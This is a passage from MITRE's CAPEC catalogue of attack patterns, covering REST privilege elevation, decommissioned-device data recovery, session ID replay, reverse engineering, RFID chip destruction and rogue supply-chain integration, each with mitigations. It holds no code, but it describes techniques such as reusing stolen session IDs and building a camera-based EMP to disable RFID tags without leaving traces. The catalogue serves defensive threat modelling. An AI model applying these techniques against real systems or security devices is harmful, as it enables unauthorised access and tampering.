ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Monitor network activity to detect any anomalous or unauthorized communication exchanges.

Related Weaknesses

CWE-ID	Weakness Name
451	User Interface (UI) Misrepresentation of Critical Information

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary, Resources_Required
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-58: Restful Privilege Elevation

Attack Pattern ID: 58

Abstraction: Detailed

View customized information:

Description

Extended Description

Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	1	Accessing Functionality Not Properly Constrained by ACLs
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete.

Skills Required

[Level: Low]

It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Enforce principle of least privilege

Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side

Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose

Example Instances

The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state.

Related Weaknesses

CWE-ID	Weakness Name
267	Privilege Defined With Unsafe Actions
269	Improper Privilege Management

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parents CAPEC-1, CAPEC-180 )

References

[REF-463] Mark O'Neill. "Security for REST Web Services". Vprde;. <http://www.vordel.com/downloads/rsa_conf_2006.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

CAPEC-675: Retrieve Data from Decommissioned Devices

Attack Pattern ID: 675

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	406	Dumpster Diving
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	37	Retrieve Embedded Sensitive Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Collect and Analyze Information
Supply Chain Risks	Disposal

Prerequisites

An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content.

Skills Required

[Level: High]

An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.

[Level: Medium]

An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content.

Consequences

Scope	Impact	Likelihood
Accountability	Bypass Protection Mechanism

Mitigations

Backup device data before erasure to retain intellectual property and inside knowledge.

Overwrite data on device rather than deleting. Deleted data can still be recovered, even if the device trash can is emptied. Rewriting data removes any trace of the old data. Performing multiple overwrites followed by a zeroing of the device (overwriting with all zeros) is good practice.

Use a secure erase software.

Physically destroy the device if it is not intended to be reused. Using a specialized service to disintegrate, burn, melt or pulverize the device can be effective, but if those services are inaccessible, drilling nails or holes, or smashing the device with a hammer can be effective. Do not burn, microwave, or pour acid on a hard drive.

Physically destroy memory and SIM cards for mobile devices not intended to be reused.

Ensure that the user account has been terminated or switched to a new device before destroying.

Example Instances

A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization.

Related Weaknesses

CWE-ID	Weakness Name
1266	Improper Scrubbing of Sensitive Data from Decommissioned Device

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1052	Exfiltration Over Physical Medium

References

[REF-663] Richard Kissel, Andrew Regenscheid, Matthew Scholl and Kevin Stine. "NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization". National Institute of Standards and Technology. 2014-12. <https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf>. URL validated: 2021-06-22.

[REF-717] Linda Pesante, Christopher King and George Silowash. "Disposing of Devices Safely". CISA United States Computer Emergency Readiness Team (US-CERT). 2012. <https://www.cisa.gov/uscert/sites/default/files/publications/DisposeDevicesSafely.pdf>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-37: Retrieve Embedded Sensitive Data

Attack Pattern ID: 37

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	167	White Box Reverse Engineering
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	65	Sniff Application Code
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	675	Retrieve Data from Decommissioned Devices

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.

Techniques
Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.

Exploit

Retrieve Embedded Data: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to retrieve the information of interest.

Techniques
API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format.

Prerequisites

In order to feasibly execute this type of attack, some valuable data must be present in client software.

Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack.

Skills Required

[Level: Medium]

The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution

Resources Required

The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as "Strings" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Example Instances

Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.

An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.

Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user.

Related Weaknesses

CWE-ID	Weakness Name
226	Sensitive Information in Resource Not Removed Before Reuse
311	Missing Encryption of Sensitive Data
525	Use of Web Browser Cache Containing Sensitive Information
312	Cleartext Storage of Sensitive Information
314	Cleartext Storage in the Registry
315	Cleartext Storage of Sensitive Information in a Cookie
318	Cleartext Storage of Sensitive Information in Executable
1239	Improper Zeroization of Hardware Register
1258	Exposure of Sensitive System Information Due to Uncleared Debug Information
1266	Improper Scrubbing of Sensitive Data from Decommissioned Device
1272	Sensitive Information Uncleared Before Debug/Power State Transition
1278	Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques
1301	Insufficient or Incomplete Data Removal within Hardware Component
1330	Remanent Data Readable after Memory Erase

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1005	Data from Local System
1552.004	Unsecured Credentials: Private Keys

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Lifting Data Embedded in Client Distributions

CAPEC-60: Reusing Session IDs (aka Session Replay)

Attack Pattern ID: 60

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

The attacker interacts with the target host and finds that session IDs are used to authenticate users.
The attacker steals a session ID from a valid user.

Exploit

The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.

Prerequisites

The target host uses session IDs to keep track of the users.

Session IDs are used to control access to resources.

The session IDs used by the target host are not well protected from session theft.

Skills Required

[Level: Low]

If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.

[Level: Medium]

More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Always invalidate a session ID after the user logout.

Setup a session time out for the session IDs.

Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).

Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.

Encrypt the session data associated with the session ID.

Use multifactor authentication.

Example Instances

OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428

Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258

Related Weaknesses

CWE-ID	Weakness Name
294	Authentication Bypass by Capture-replay
290	Authentication Bypass by Spoofing
346	Origin Validation Error
384	Session Fixation
488	Exposure of Data Element to Wrong Session
539	Use of Persistent Cookies Containing Sensitive Information
200	Exposure of Sensitive Information to an Unauthorized Actor
285	Improper Authorization
664	Improper Control of a Resource Through its Lifetime
732	Incorrect Permission Assignment for Critical Resource

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1134.001	Access Token Manipulation:Token Impersonation/Theft
1550.004	Use Alternate Authentication Material:Web Session Cookie

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Skills_Required, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Mitigations, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-190: Reverse Engineer an Executable to Expose Assumed Hidden Functionality

Attack Pattern ID: 190

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	167	White Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Resources Required

Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations

Related Weaknesses

CWE-ID	Weakness Name
912	Hidden Functionality

Notes

Other

White box analysis techniques include file or binary analysis, debugging, disassembly, and decompilation, and generally fall into categories referred to as 'static' and 'dynamic' analysis. Static analysis encompasses methods which analyze the binary, or extract its source code or object code without executing the program. Dynamic analysis involves analyzing the program during execution.

Some forms of file analysis tools allow the executable itself to be analyzed, the most basic of which can analyze features of the binary. More sophisticated forms of static analysis analyze the binary file and extract assembly code, and possibly source code representations, from analyzing the structure of the file itself. Dynamic analysis tools execute the binary file and monitor its in memory footprint, revealing its execution flow, memory usage, register values, and machine instructions. This type of analysis is most effective for analyzing the execution of binary files whose content has been obfuscated or encrypted in its native executable form.

Debuggers allow the program's execution to be monitored, and depending upon the debugger's sophistication may show relevant source code for each step in execution, or may display and allow interactions with memory, variables, or values generated by the program during run-time operations. Disassemblers operate in reverse of assemblers, allowing assembly code to be extracted from a program as it executes machine code instructions. Disassemblers allow low-level interactions with the program as it executes, such as manipulating the program's run time operations. Decompilers can be utilized to analyze a binary file and extract source code from the compiled executable. Collectively, the tools and methods described are those commonly applied to a binary executable file and provide means for reverse engineering the file by revealing the hidden functions of its operation or composition.

References

[REF-51] "Wikipedia". Decompiler. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Decompiler>.

[REF-52] "Wikipedia". Debugger. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Debugger>.

[REF-53] "Wikipedia". Disassembler. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Disassembler>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, Other_Notes, Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated @Name, Notes, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2019-04-04 (Version 3.1)	Reverse Engineer an Executable to Expose Assumed Hidden Functionality or Content

CAPEC-188: Reverse Engineering

Attack Pattern ID: 188

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	167	White Box Reverse Engineering
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	189	Black Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Access to targeted system, resources, and information.

Skills Required

[Level: High]

Understanding of low level programming languages or technologies can be very helpful. For example, when reverse engineering a binary file, an understanding of assembly languages can help to determine the purpose and inner-workings of the code. Another example is reverse engineering an application that relies on networking. Here, an understanding networking protocols can provide insight into application details.

Resources Required

The technical resources necessary to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed.

Mitigations

Employ code obfuscation techniques to prevent the adversary from reverse engineering the targeted entity.

Example Instances

When adversaries are reverse engineering software, methodologies fall into two broad categories, 'white box' and 'black box.' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. 'Black Box' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs.

Related Weaknesses

CWE-ID	Weakness Name
1278	Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques

References

[REF-50] "Wikipedia". Reverse engineering. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Reverse_engineering>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-400: RFID Chip Deactivation or Destruction

Attack Pattern ID: 400

Abstraction: Detailed

View customized information:

Description

Extended Description

When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-524: Rogue Integration Procedures

Attack Pattern ID: 524

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	439	Manipulation During Distribution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Distribution

Prerequisites

Physical access to an integration facility that prepares the system before it is deployed at the victim location.

Skills Required

[Level: High]

Advanced knowledge of the design of the system.

[Level: High]

Hardware creation and manufacture of replacement components.

Mitigations

Deploy strong code integrity policies to allow only authorized apps to run.

Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.

Require SSL for update channels and implement certificate transparency based verification.

Sign everything, including configuration files, XML files and packages.

Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.

Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.

Example Instances

An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed.

